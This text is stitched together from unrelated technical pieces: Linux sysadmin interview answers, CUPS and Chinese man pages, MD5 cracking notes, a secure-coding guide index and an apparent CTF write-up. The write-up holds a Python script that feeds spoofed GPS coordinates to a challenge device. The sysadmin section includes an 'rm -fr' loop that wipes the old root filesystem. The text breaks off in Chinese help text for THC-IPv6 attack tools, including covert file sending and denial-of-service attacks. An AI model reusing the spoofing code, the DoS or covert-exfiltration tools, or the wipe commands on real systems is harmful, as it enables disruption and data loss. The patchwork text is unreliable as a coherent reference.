<summary><b>The team of admins needs your support. You must remotely reinstall the system on one of the main servers. There is no access to the management console (e.g. iDRAC). How to install Linux on a disk from within, and in place of, another running Linux?</b></summary><br>

In other words: "_system installation from within, and in place of, an already running system_". On the example of the Debian GNU/Linux distribution.

1. Create a working directory and download the system using the debootstrap tool:

```bash
_working_directory="/mnt/system"
mkdir $_working_directory
debootstrap --verbose --arch amd64 {wheezy|jessie} $_working_directory http://ftp.en.debian.org/debian
```

2. Mount the pseudo filesystems: `proc`, `sys`, `dev` and `dev/pts`:

```bash
for i in proc sys dev dev/pts ; do mount -o bind /$i $_working_directory/$i ; done
```

3. Copy the system backup to restore:

```bash
cp system_backup_22012015.tgz $_working_directory/mnt
```

However, it is better not to waste space and do it in a different way (assuming that the copy is in `/mnt/backup`):

```bash
_backup_directory="${_working_directory}/mnt/backup"
mkdir $_backup_directory && mount --bind /mnt/backup $_backup_directory
```

4. Chroot into the "new" system:

```bash
chroot $_working_directory /bin/bash
```

5. Update the information about mounted devices:

```bash
grep -v rootfs /proc/mounts > /etc/mtab
```

6. In the "new" system, the next thing to do is mount the disk on which the "old" system is located (e.g. `/dev/sda1`):

```bash
_working_directory="/mnt/old_system"
_backup_directory="/mnt/backup"
mkdir $_working_directory && mount /dev/sda1 $_working_directory
```

7. Remove all files of the old system:

```bash
cd $_working_directory
for i in $(ls | awk '!(/proc/ || /dev/ || /sys/ || /mnt/)') ; do rm -fr $i ; done
```

8. The next step is to restore the system from a backup:
```bash
tar xzvfp $_backup_directory/system_backup_22012015.tgz -C $_working_directory
```

9. And mount `proc`, `sys`, `dev` and `dev/pts` in the new working directory:

```bash
for i in proc sys dev dev/pts ; do mount -o bind /$i $_working_directory/$i ; done
```

10. Install and update the grub configuration:

```bash
chroot $_working_directory /bin/bash -c "grub-install --no-floppy --root-directory=/ /dev/sda"
chroot $_working_directory /bin/bash -c "update-grub"
```

11. Unmount the `proc`, `sys`, `dev` and `dev/pts` filesystems:

```bash
cd
grep $_working_directory /proc/mounts | cut -f2 -d " " | sort -r | xargs umount -n
```

None of the available commands, i.e. `halt`, `shutdown` or `reboot`, will work. You need to tear down the old userspace and flush state - to do this, use the magic SysRq interface (deliberately without the '**b**' key, which would reboot immediately):

```bash
echo 1 > /proc/sys/kernel/sysrq
echo reisu > /proc/sysrq-trigger
```

Of course, it is recommended to fully restart the machine in order to completely load the current system. To do this:

```bash
sync ; reboot -f
```

</details>

<details>
<summary><b>Rsync triggered the Linux OOM killer on a single 50 GB file. How does the OOM killer decide which process to kill first? How to control this?</b></summary><br>

Major distribution kernels set the default value of `/proc/sys/vm/overcommit_memory` to zero, which means that processes can request more memory than is currently free in the system. If memory is exhaustively used up by processes, to the extent that it can threaten the stability of the system, then the **OOM killer** comes into the picture.

NOTE: It is the task of the **OOM killer** to continue killing processes until enough memory is freed for the smooth functioning of the rest of the processes that the kernel is attempting to run.

The **OOM killer** has to select the best process(es) to kill. Best here refers to the process which will free up the maximum memory upon being killed and is also the least important to the system. The primary goal is to kill the least number of processes, minimizing the damage done while maximizing the amount of memory freed.

To facilitate this, the kernel maintains an `oom_score` for each of the processes. You can see the `oom_score` of each process in the `/proc` filesystem under the pid directory:

```bash
cat /proc/10292/oom_score
```

The higher the value of `oom_score` for any process, the higher its likelihood of getting killed by the **OOM killer** in an out-of-memory situation. When analyzing OOM killer logs, it is also important to look at what triggered it.

If you want to create a special control group containing the list of processes which should be the first to receive the **OOM killer's** attention, create a directory under `/mnt/oom-killer` to represent it:

```bash
mkdir lambs
```

Set `oom.priority` to a value high enough:

```bash
echo 256 > /mnt/oom-killer/lambs/oom.priority
```

`oom.priority` is a 64-bit unsigned integer, and can have a maximum value an unsigned 64-bit number can hold. While scanning for the process to be killed, the **OOM killer** selects a process from the list of tasks with the highest `oom.priority` value.
Add the PID of each process that should be on the list to the tasks file:

```bash
echo <pid> > /mnt/oom-killer/lambs/tasks
```

To create a list of processes which will not be killed by the **OOM killer**, make a directory to contain them:

```bash
mkdir invincibles
```

Setting `oom.priority` to zero excludes all processes in this cgroup from the list of target processes to be killed:

```bash
echo 0 > /mnt/oom-killer/invincibles/oom.priority
```

To add more processes to this group, add the pid of the task to the list of tasks in the invincibles group:

```bash
echo <pid> > /mnt/oom-killer/invincibles/tasks
```

Note that the `oom.priority` cgroup interface shown here comes from the "Taming the OOM killer" patch set discussed on LWN (linked below) and is not part of mainline kernels; on stock kernels you adjust `/proc/<pid>/oom_score_adj` instead.

Useful resources:

- [Rsync triggered Linux OOM killer on a single 50 GB file](https://serverfault.com/questions/724469/rsync-triggered-linux-oom-killer-on-a-single-50-gb-file)
- [Taming the OOM killer](https://lwn.net/Articles/317814/)

</details>

<details>
<summary><b>You have a lot of sockets hanging in <code>TIME_WAIT</code>. Your HTTP service behind a proxy serves a lot of small HTTP requests. How to check and reduce <code>TIME_WAIT</code> sockets? ***</b></summary><br>

To be completed.

Useful resources:

- [How to reduce number of sockets in TIME_WAIT?](https://serverfault.com/questions/212093/how-to-reduce-number-of-sockets-in-time-wait)

</details>

<details>
<summary><b>How do <code>SO_REUSEADDR</code> and <code>SO_REUSEPORT</code> differ? Explain all socket implementations. ***</b></summary><br>

To be completed.

</details>
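A starting sketch for the two unanswered questions above. For `TIME_WAIT`, assuming a modern Linux with `ss` available (illustrative commands, not a complete answer):

```bash
# Count sockets per state; on a busy proxy TIME_WAIT usually dominates
ss -tan state time-wait | wc -l

# The TIME_WAIT period itself is a 60s compile-time constant on Linux;
# what can be tuned instead:
sysctl -w net.ipv4.tcp_tw_reuse=1                      # reuse TIME_WAIT sockets for new outgoing connections
sysctl -w net.ipv4.ip_local_port_range="15000 65000"   # widen the ephemeral port range
```

Enabling keep-alive between the proxy and the backend reduces the connection churn that creates those sockets in the first place. As for `SO_REUSEADDR` vs `SO_REUSEPORT`, in short: `SO_REUSEADDR` mainly allows binding a listening socket while old connections to the same port still linger in `TIME_WAIT`, while `SO_REUSEPORT` (Linux 3.9+) allows several sockets to bind exactly the same address:port pair, with the kernel load-balancing incoming connections between them.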
cupsenable
===

Start the specified printer(s)

## Description

The **cupsenable command** is used to start the specified printer(s).

### Syntax

```shell
cupsenable(options)(parameters)
```

### Options

```shell
-E: force encryption when connecting to the server;
-U: the username to use when connecting to the server;
-u: the user the print jobs belong to;
-h: the server name and port number to connect to;
```

### Parameters

Destination: the target printer.
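A usage sketch (the queue name `LaserJet` and the server below are made up for illustration):

```bash
# Re-enable a stopped queue on the local CUPS server
cupsenable LaserJet

# Same, against a remote CUPS server over an encrypted connection, as user admin
cupsenable -E -U admin -h cups.example.com:631 LaserJet
```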
'\" t .TH "OS\-RELEASE" "5" "" "systemd 231" "os-release" .\" ----------------------------------------------------------------- .\" * Define some portability stuff .\" ----------------------------------------------------------------- .\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .\" http://bugs.debian.org/507673 .\" http://lists.gnu.org/archive/html/groff/2009-02/msg00013.html .\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .ie \n(.g .ds Aq \(aq .el .ds Aq ' .\" ----------------------------------------------------------------- .\" * set default formatting .\" ----------------------------------------------------------------- .\" disable hyphenation .nh .\" disable justification (adjust text to left margin only) .ad l .\" ----------------------------------------------------------------- .\" * MAIN CONTENT STARTS HERE * .\" ----------------------------------------------------------------- .SH "NAME" os-release \- 操作系统标识 .SH "SYNOPSIS" .PP /etc/os\-release .PP /usr/lib/os\-release .SH "描述" .PP /etc/os\-release 与 /usr/lib/os\-release 文件包含了操作系统识别数据。 .PP os\-release 文件的基本格式是 一系列换行符分隔的 VAR=VALUE 行(每行一个变量), 可以直接嵌入到 shell 脚本中使用。 注意,此文件并不支持变量替换之类的任何高级 shell 特性, 以便于应用程序无须支持这些高级 shell 特性, 即可直接使用此文件。 如果 VALUE 值中包含任何非字母数字字符(也就是 A\(enZ, a\(enz, 0\(en9 之外的字符), 那么必须使用引号(单双皆可)界定, 并且任何在Shell中具有特殊含义的字符, 包括:美元符, 单双引号, 反斜线, 反引号 \&.\&.\&. 等等,都必须使用shell风格的反斜线进行转义。 所有字符串都必须使用UTF\-8编码, 并且禁止使用一切非打印字符。 以"#"开头的行将被作为注释忽略。 .PP 应用程序应该只读取 /etc/os\-release 文件, 仅在 /etc/os\-release 不存在的情况下, 才可以读取 /usr/lib/os\-release 文件。 绝对禁止应用程序同时读取两个文件。 操作系统发行商应该将操作系统识别数据存放在 /usr/lib/os\-release 文件中, 同时将 /etc/os\-release 作为一个软连接, 以相对路径的方式指向 /usr/lib/os\-release 文件, 以提供应用程序读取 /etc 的兼容性。 软连接使用相对路径是为了避免在 chroot 或 initrd 环境中失效。 .PP os\-release 的内容应当仅由发行版的供应商设置, 系统管理员一般不应该修改此文件。 .PP 因为此文件仅用于操作系统识别, 所以必须禁止包含任何需要本地化的内容(也就是禁止包含非ASCII字符)。 .PP /etc/os\-release 与 /usr/lib/os\-release 可以是软连接, 但是必须全部位于根文件系统上, 以确保在系统刚启动时即可读取其内容。 .PP 更多有关 os\-release 的理解, 请参阅 \m[blue]\fBAnnouncement of /etc/os\-release\fR\m[]\&\s-2\u[1]\d\s+2 .SH "选项" .PP 可以在 os\-release 中使用下列操作系统识别字段: .PP \fINAME=\fR .RS 4 不带版本号且适合人类阅读的操作系统名称。这是必填字段。例如: "NAME=Fedora" 或 "NAME="Debian GNU/Linux"" 。 默认值是 "NAME=Linux" 。 .RE .PP \fIVERSION=\fR .RS 4 操作系统的版本号。 禁止包含操作系统名称,但是可以包含适合人类阅读的发行代号。 这是可选字段。 例如: "VERSION=17" 或 "VERSION="17 (Beefy Miracle)"" .RE .PP \fIID=\fR .RS 4 小写字母表示的操作系统名称, 禁止包含 0\(en9, a\(enz, "\&.", "_", "\-" 以外的字符,禁止包含任何版本信息。 该字段适合被程序或脚本解析,也可用于生成文件名。 这是必填字段。例如: "ID=fedora" 或 "ID=debian" 。 默认值是 "ID=linux" 。 .RE .PP \fIID_LIKE=\fR .RS 4 一系列空格分隔的字符串, 其中的每一项都符合 \fIID=\fR 字段的规范, 也就是仅包含 0\(en9, a\(enz, "\&.", "_", "\-" 字符。 此字段用于表明当前的操作系统 是从哪些"父发行版"派生而来, 切勿列出从此发行版派生的"子发行版", 排列顺序由近到远, 关系最近的发行版名称排在最前, 紧密度依次递减。 应用程序如果不能识别 \fIID=\fR 字段的内容, 那么可以参考此字段。 这是可选字段。 比如对于 "ID=centos"来说, "ID_LIKE="rhel fedora"" 就是一个合理的设置。 而对于 "ID=ubuntu" 来说, "ID_LIKE=debian" 也很合理。 .RE .PP \fIVERSION_CODENAME=\fR .RS 4 小写字母表示的操作系统发行代号, 禁止包含 0\(en9, a\(enz, "\&.", "_", "\-" 以外的字符, 禁止包含任何版本信息以及操作系统名称。 该字段适合被程序或脚本解析, 也可用于生成文件名。 这是可选字段, 并且某些发行版可能不存在此字段。例如: "VERSION_CODENAME=buster", "VERSION_CODENAME=xenial" .RE .PP \fIVERSION_ID=\fR .RS 4 小写字母表示的操作系统版本号, 禁止包含 0\(en9, a\(enz, "\&.", "_", "\-" 以外的字符, 禁止包含操作系统名称与发行代号。 该字段适合被程序或脚本解析, 也可用于生成文件名。 这是可选字段。例如: "VERSION_ID=17" 或 "VERSION_ID=11\&.04" .RE .PP \fIPRETTY_NAME=\fR .RS 4 适合人类阅读的比较恰当的发行版名称, 可选的包含发行代号与系统版本之类的信息,内容比较随意。 这是必填字段。 例如: "PRETTY_NAME="Fedora 17 (Beefy Miracle)"" 。 默认值是 "PRETTY_NAME="Linux"" 。 .RE .PP \fIANSI_COLOR=\fR .RS 4 在控制台上显示操作系统名称的文字颜色。 必须设为符合 ESC [ m ANSI/ECMA\-48 转义代码规范的字符串。 这是可选字段。 例如: 
"ANSI_COLOR="0;31""(红色) 或 "ANSI_COLOR="1;34""(淡蓝) .RE .PP \fICPE_NAME=\fR .RS 4 操作系统的"CPE名称"(URI绑定语法), 详见 \m[blue]\fBCommon Platform Enumeration Specification\fR\m[]\&\s-2\u[2]\d\s+2 文档。 这是可选字段。例如: "CPE_NAME="cpe:/o:fedoraproject:fedora:17"" .RE .PP \fIHOME_URL=\fR, \fISUPPORT_URL=\fR, \fIBUG_REPORT_URL=\fR, \fIPRIVACY_POLICY_URL=\fR .RS 4 与操作系统相关的互联网地址。 \fIHOME_URL=\fR 操作系统的主页地址, 或者特定于此版本操作系统的页面地址。 \fISUPPORT_URL=\fR 操作系统的支持页面(若存在), 主要用于发行商提供技术支持的页面。 \fIBUG_REPORT_URL=\fR 故障汇报页面(若存在), 主要用于基于社区互动的发行版。 \fIPRIVACY_POLICY_URL=\fR 隐私条款页面(若存在)。 上述URL应该分别出现在"About this system"界面下的 "About this Operating System", "Obtain Support", "Report a Bug", "Privacy Policy" 子界面中。 这些字段的值必须符合 \m[blue]\fBRFC3986\fR\m[]\&\s-2\u[3]\d\s+2 规范, 通常以 "http:" 或 "https:" 开头, 但也可能以 "mailto:" 或 "tel:" 开头。 例如: "HOME_URL="https://fedoraproject\&.org/"" 与 "BUG_REPORT_URL="https://bugzilla\&.redhat\&.com/"" .RE .PP \fIBUILD_ID=\fR .RS 4 用于区分同一版本操作系统的不同编译次序的唯一标示符(不会被系统更新所修改)。 该字段在不同的 VERSION_ID 之间有可能是相同的, 因为 BUILD_ID 仅在同一版本号内部保持唯一。 每当发布新版本的操作系统时, 只需要更新 VERSION_ID 字段即可,并不一定必须更新 BUILD_ID 字段。 这是可选字段。 例如: "BUILD_ID="2013\-03\-20\&.3"" 或 "BUILD_ID=201303203" .RE .PP \fIVARIANT=\fR .RS 4 适合人类阅读的发行版分支标识符。 用于向用户表明 此系统的默认配置是专门面向特定应用场景的。 这是可选字段, 并且某些发行版可能不存在此字段。 例如: "VARIANT="Server Edition"", "VARIANT="Smart Refrigerator Edition"" 注意,此字段仅用于显示目的, 程序应该使用 \fIVARIANT_ID\fR 字段进行可靠的判断。 .RE .PP \fIVARIANT_ID=\fR .RS 4 小写字母表示的发行版分支标识符, 禁止包含 0\(en9, a\(enz, "\&.", "_", "\-" 以外的字符。 该字段适合被程序或脚本解析, 也可用于生成文件名。 这是可选字段, 并且某些发行版可能不存在此字段。 例如: "VARIANT_ID=server", "VARIANT_ID=embedded" .RE .PP 如果要在程序中检测发行版名称及其变种, 那么可以使用 \fIID\fR 与 \fIVERSION_ID\fR 字段, 并将 \fIID_LIKE\fR 用作 \fIID\fR 的替补。 如果想要向用户显示发行版的名称, 那么可以使用 \fIPRETTY_NAME\fR 字段。 .PP 注意, 滚动发布的发行版可能不会提供版本信息, 也就程序不能假定 \fIVERSION\fR 与 \fIVERSION_ID\fR 字段必然存在。 .PP 操作系统的发行商可能为此文件引入新的字段, 强烈建议为新引入的字段使用特别的前缀以避免冲突。 读取此文件的程序应该能够安全的忽略不理解的字段。 例如: "DEBIAN_BTS="debbugs://bugs\&.debian\&.org/"" .SH "例子" .sp .if n \{\ .RS 4 .\} .nf NAME=Fedora VERSION="24 (Workstation Edition)" ID=fedora VERSION_ID=24 PRETTY_NAME="Fedora 24 (Workstation Edition)" ANSI_COLOR="0;34" CPE_NAME="cpe:/o:fedoraproject:fedora:24" HOME_URL="https://fedoraproject\&.org/" BUG_REPORT_URL="https://bugzilla\&.redhat\&.com/" REDHAT_BUGZILLA_PRODUCT="Fedora" REDHAT_BUGZILLA_PRODUCT_VERSION=24 REDHAT_SUPPORT_PRODUCT="Fedora" REDHAT_SUPPORT_PRODUCT_VERSION=24 PRIVACY_POLICY_URL=https://fedoraproject\&.org/wiki/Legal:PrivacyPolicy VARIANT="Workstation Edition" VARIANT_ID=workstation .fi .if n \{\ .RE .\} .SH "参见" .PP \fBsystemd\fR(1), \fBlsb_release\fR(1), \fBhostname\fR(5), \fBmachine-id\fR(5), \fBmachine-info\fR(5) .SH "NOTES" .IP " 1." 4 Announcement of /etc/os-release .RS 4 \%http://0pointer.de/blog/projects/os-release .RE .IP " 2." 4 Common Platform Enumeration Specification .RS 4 \%http://scap.nist.gov/specifications/cpe/ .RE .IP " 3." 4 RFC3986 .RS 4 \%https://tools.ietf.org/html/rfc3986 .RE .\" manpages-zh translator: 金步国 .\" manpages-zh comment: 金步国作品集:http://www.jinbuguo.com
# Race of a lifetime, Misc, 100pts > You are participating in a race around the world. The prize would be a personalized flag, together with a brand new car. Who wouldn't want that? You are given some locations during this race, and you need to get there as quick as possible. The race organisation is monitoring your movements using the GPS embedded in the car. However, your car is so old and could never win against those used by the opposition. Time to figure out another way to win this race. A pretty simple challenge, we just have to pretend to be GPS output and spoof it to make it look as though we are very fast (but not too fast, to avoid triggering some "asserts"). Final code: ```python import serial, sys s = serial.Serial("/dev/ttyUSB0", 115200, timeout = 2) print s.read_until("\t") s.write("ak\n") t = s.read_until(">") print t t = t.splitlines()[2].split() lat = float(t[1]) lng = float(t[3]) airports = [ (49.0096906, 2.5479245), # Paris (31.1443439, 121.808273), # Shanghai (37.6213129, -122.3789554), # San Francisco ] plan = [ (51.9979819, 4.3855044, "R", "tgt") # Riscure ] i = 0 speed = { "R": 0.3, "A": 7, "A2": 7.5, "R2": 0.9, } dt = 1 def length(a, b): return (a**2 + b**2) ** 0.5 def demax(dlat, dlng): l = length(dlat, dlng) if l > dt: dlat /= l dlng /= l dlat *= dt dlng *= dt return dlat, dlng tm = 0 while True: tm += 1 print "time", tm print "plan: ", plan print "GOTO", plan[i] dlat, dlng = plan[i][0] - lat, plan[i][1] - lng if dt > 6: dt = 7 + (2) / (51.99 - 31.14) * (lat - 31.14) print "spd", dt if abs(dlat) < 0.01 and abs(dlng) < 0.01: i += 1 dt = speed[plan[i][2]] dlat, dlng = plan[i][0] - lat, plan[i][1] - lng print "delta1", dlat, dlng if dlng < -180: dlng += 360 print "delta2", dlat, dlng dlat, dlng = demax(dlat, dlng) lat += dlat lng += dlng if lng > 180: lng -= 360 s.write("%.7f %.7f\n" % (lat, lng)) rd = s.read_until(">") print rd lines = rd.splitlines() for line in lines: if "Location:" in line or "Delft" in line: if "Kearny" in line: tgtlat, tgtlng = 37.7933885, -122.4067155 elif "Delft" in line: tgtlat, tgtlng = (51.9979819, 4.3855044) # Riscure else: line = line.split() tgtlat = float(line[1]) tgtlng = float(line[2]) dbest = length(lat - tgtlat, lng - tgtlng) / speed["R"] plan = [(tgtlat, tgtlng, "R", "tgt")] for a1 in airports: for a2 in airports: d1 = length(lat - a1[0], lng - a1[1]) / speed["R"] d2 = length(tgtlat - a2[0], tgtlng - a2[1]) / speed["R"] d3 = length(a1[0] - a2[0], a1[1] - a2[1]) / speed["A"] d = d1 + d2 + d3 if d < dbest: dbest = d ch = "A" ch2 = "R" if "Delft" in line: ch = "A2" ch2 = "R2" plan = [(a1[0], a1[1], "R", "air1"), (a2[0], a2[1], ch, "air2"), (tgtlat, tgtlng, ch2, "tgt")] i = 0 tm = 0 dt = speed[plan[i][2]] ```
### MD5 Basics

MD5's input and output are as follows:

- Input: a message of arbitrary length, processed in 512-bit blocks.
- Output: a 128-bit message digest.

For a detailed description, search for it yourself.

Also, the MD5 value we obtain is sometimes only 16 characters long. Those 16 characters are taken from the 32-character MD5: they are what remains of the 32-character digest after removing its first 8 and last 8 characters.

Generally, we can tell whether a function is MD5 from its initialization. If a function initializes the following four variables, we can guess it is MD5, since these are MD5's initialization IV:

```
0x67452301,0xEFCDAB89,0x98BADCFE,0x10325476
```

### Cracking MD5

MD5 can be considered essentially broken by now; common MD5 collisions/preimages can be looked up at the following sites:

- http://www.cmd5.com/
- http://www.ttmd5.com/
- http://pmd5.com/
- https://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip (generates MD5 collisions with a chosen prefix)
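A quick Python sketch of the 32-character vs 16-character relation described above (keep the middle 16 hex characters, i.e. drop the first 8 and the last 8):

```python
import hashlib

full = hashlib.md5(b"hello").hexdigest()  # 32 hex chars: 5d41402abc4b2a76b9719d911017c592
short = full[8:24]                        # the "16-char" md5:  bc4b2a76b9719d91
print(full, short)
```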
# Secure Coding Guide

A secure coding guide organized for developers, intended to map out API-level risk points and provide detailed, actionable secure coding solutions.

## Philosophy

Based on the DevSecOps philosophy, we hope to explain secure coding practices in a way developers find easier to understand, steering them to avoid vulnerabilities at the source.

## Index

| Guide | Last revised |
| ------------------ | ------------ |
| [C/C++ Secure Coding Guide](./C,C++安全指南.md) | 2021-05-18 |
| [JavaScript Secure Coding Guide](./JavaScript安全指南.md#1) | 2021-05-18 |
| [Node Secure Coding Guide](./JavaScript安全指南.md#2) | 2021-05-18 |
| [Go Secure Coding Guide](./Go安全指南.md) | 2021-05-18 |
| [Java Secure Coding Guide](./Java安全指南.md) | 2021-05-18 |
| [Python Secure Coding Guide](./Python安全指南.md) | 2021-05-18 |

## Practice

The secure coding guidelines can be used in the following scenarios:

- day-to-day reference for developers
- writing scan policies for security systems
- security component development
- vulnerability remediation guidance

## Contributing

We hope to maintain and improve this together with the community. Revision suggestions are welcome; for details see the [contribution guide](./CONTRIBUTING.md).

## License

Secure Coding Guide by THL A29 Limited, a Tencent company, is licensed under [CC BY 4.0](https://creativecommons.org/licenses/by-sa/4.0/).
.\" Copyright (c) 1983, 1991 The Regents of the University of California. .\" All rights reserved. .\" .\" Redistribution and use in source and binary forms, with or without .\" modification, are permitted provided that the following conditions .\" are met: .\" 1. Redistributions of source code must retain the above copyright .\" notice, this list of conditions and the following disclaimer. .\" 2. Redistributions in binary form must reproduce the above copyright .\" notice, this list of conditions and the following disclaimer in the .\" documentation and/or other materials provided with the distribution. .\" 3. All advertising materials mentioning features or use of this software .\" must display the following acknowledgement: .\" This product includes software developed by the University of .\" California, Berkeley and its contributors. .\" 4. Neither the name of the University nor the names of its contributors .\" may be used to endorse or promote products derived from this software .\" without specific prior written permission. .\" .\" THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND .\" ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE .\" IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE .\" ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE .\" FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL .\" DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS .\" OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) .\" HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT .\" LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY .\" OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF .\" SUCH DAMAGE. .\" .\" Modified Fri Jul 23 22:07:54 1993 by Rik Faith <faith@cs.unc.edu> .\" Modified 950727 by aeb, following a suggestion by Urs Thuermann .\" <urs@isnogud.escape.de> .\" Modified Tue Oct 22 08:11:14 EDT 1996 by Eric S. Raymond <esr@thyrsus.com> .\" Modified 1998 by Andi Kleen .\" 中文版 Copyright (c) 2002 byeyear 和 www.linuxforum.net .\" .TH LISTEN 2 "23 July 1993" "BSD Man Page" "Linux Programmer's Manual" .SH NAME 名称 listen \- listen for connections on a socket 在一个套接字上倾听连接 .SH SYNOPSIS 概述 .B #include <sys/socket.h> .sp .BI "int listen(int " s ", int " backlog ); .SH DESCRIPTION 描述 在接收连接之前,首先要使用 .BR socket (2) 创建一个套接字,然后调用 .BR listen 使其能够自动接收到来的连接并且为连接队列指定一个长度限制. 之后就可以使用 .BR accept (2) 接收连接. .B listen 调用仅适用于 .B SOCK_STREAM 或者 .BR SOCK_SEQPACKET 类型的套接字. .PP 参数 .I backlog 指定未完成连接队列的最大长度.如果一个连接请求到达时未完成连接 队列已满,那么客户端将接收到错误 .B ECONNREFUSED. 或者,如果下层协议支持重发,那么这个连接请求将被忽略,这样客户端 在重试的时候就有成功的机会. .SH NOTES 注意 在TCP套接字中 .I backlog 的含义在Linux 2.2中已经改变. 它指定了已经完成连接正等待应用程序接收的套接字队列的长度,而不是 未完成连接的数目.未完成连接套接字队列的最大长度可以使用 .B tcp_max_syn_backlog sysctl设置 当打开syncookies时不存在逻辑上的最大长度,此设置将被忽略.参见 .BR tcp (7) 以获取更多信息. .SH "RETURN VALUE" "返回值" 函数执行成功时返回0.错误时返回\-1,并置相应错误代码. .I errno .SH ERRORS 错误 .TP .B EBADF 参数 .I s 不是合法的描述符. .TP .B ENOTSOCK 参数 .I s 不是一个套接字. .TP .B EOPNOTSUPP 套接字类型不支持 .B listen 操作. .SH "CONFORMING TO" "兼容于" Single Unix, 4.4BSD, POSIX 1003.1g. .B listen 函数调用最初出现于4.2BSD. .SH BUGS 勘误 如果套接字类型是 .BR AF_INET , 并且参数 .I backlog 大于常量 .B SOMAXCONN (Linux 2.0&2.2中是128),它将被自动截断为 .BR SOMAXCONN 的值. 有的BSD系统(以及一些BSD扩展)将backlog值限制为5. 
.SH "SEE ALSO" "参见" .BR accept (2), .BR connect (2), .BR socket (2) .SH "[中文版维护人]" .B byeyear <love_my_love@263.net > .SH "[中文版最新更新]" .B 2002.01.27 .SH "《中国linux论坛man手册页翻译计划》:" .BI http://cmpp.linuxforum.net
# THC-IPV6软件包描述 一套完整的工具,可以攻击IPV6和ICMP6固有的协议弱点,并且包含一个易于使用的数据包生产库。 资料来源:https://www.thc.org/thc-ipv6/ [THC-IPV6主页](https://www.thc.org/thc-ipv6/) | [Kali THC-IPV6资源](http://git.kali.org/gitweb/?p=packages/thc-ipv6.git;a=summary) - 作者:The Hacker’s Choice - 许可证:AGPLv3 ## THC-IPV6包含的工具 ### 6to4test.sh - 测试IPv4目标是否有激活的动态6to4隧道 ``` root@kali:~# 6to4test.sh 语法: /usr/bin/6to4test.sh interface ipv4address 这个小脚本测试IPv4目标是否有激活的动态6to4隧道 需要thc-ipv6的address6和thcping6工具 ``` ### address6 - 将mac或ipv4地址转换为ipv6地址 ``` root@kali:~# address6 address6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法: address6 mac-address [ipv6-prefix] address6 ipv4-address [ipv6-prefix] address6 ipv6-address 将mac或ipv4地址转换为ipv6地址(如果没有给定第二个选项作为前缀,则使用本地的),或者当给出ipv6地址时, 打印mac或ipv4地址。 输出所有可能的变化。 出错时返回-1或已转换的结果数量 ``` ### alive6 - 显示分段中的活动地址 ``` root@kali:~# alive6 alive6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法: alive6 [-I srcip6] [-i file] [-o file] [-DM] [-p] [-F] [-e opt] [-s port,..] [-a port,..] [-u port,..] [-W TIME] [-dlrvS] interface [unicast-or-multicast-address [remote-router]] 显示分段中的活动地址。如果指定了远程路由器,则数据包以分段前缀的路由首部发送 选项: -i file 从输入文件检查系统 -o file 结果写入输出文件 -M 从输入地址枚举硬件地址(MAC)(慢!) -D 从输入地址枚举DHCP地址空间 -p 发送ping数据包进行活跃检查(默认) -e dst,hop 发送一个错误数据包:目标(默认),逐跳 -s port,port,.. 发送TCP-SYN报文到端口进行活跃检查 -a port,port,..T 发送TCP-ACK报文到端口进行活跃检查 -u port,port,.. 发送UDP数据包到端口进行活跃检查 -d DNS解析活跃的ipv6地址 -n number 每个数据包的发送频率(默认值:本地1、远程2) -W time 发送数据包后等待的时间-毫秒(默认值:1) -S 慢速模式,为每个远程目标获取最佳路由或当不存在代理时 -I srcip6 使用指定的IPv6地址作为源 -l 使用本地链接地址而不是全局地址 -v 详细信息(vv:更详细信息,vvv:转储所有数据包) 命令行或输入文件中的目标地址可以包括如下形式的范围 2001:db8::1-fff或2001:db8::1-2:0-ffff:0:0-ffff,等等 出错时返回-1,如果找到的系统是活跃的返回0,什么也没找到则返回1。 ``` ### covert_send6 - 将文件内容隐秘地发送到目标 ``` root@kali:~# covert_send6 covert_send6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法: covert_send6 [-m mtu] [-k key] [-s resend] interface target file [port] 选项: -m mtu 指定最大MTU(默认值:interface MTU,min:1000) -k key 用Blowfish-160加密内容 -s resend 每个分组发送resend次,默认值:1 将文件的内容隐秘地发送到目标,并且其POC - 除比较复杂外 - 刚好放入目标首部。 ``` ### covert_send6d - 将隐秘接收的内容写入文件 ``` root@kali:~# covert_send6d covert_send6d v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:covert_send6d [-k key] interface file 选项: -k key 用Blowfish-160解密内容 将隐秘接收的内容写入文件。 ``` ### denial6 - 对目标执行各种拒绝服务攻击 ``` root@kali:~# denial6 denial6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:denial6 interface destination test-case-number 对目标执行各种拒绝服务攻击。 如果系统是易受攻击的,则这可导致系统崩溃或重载,所以要小心! 
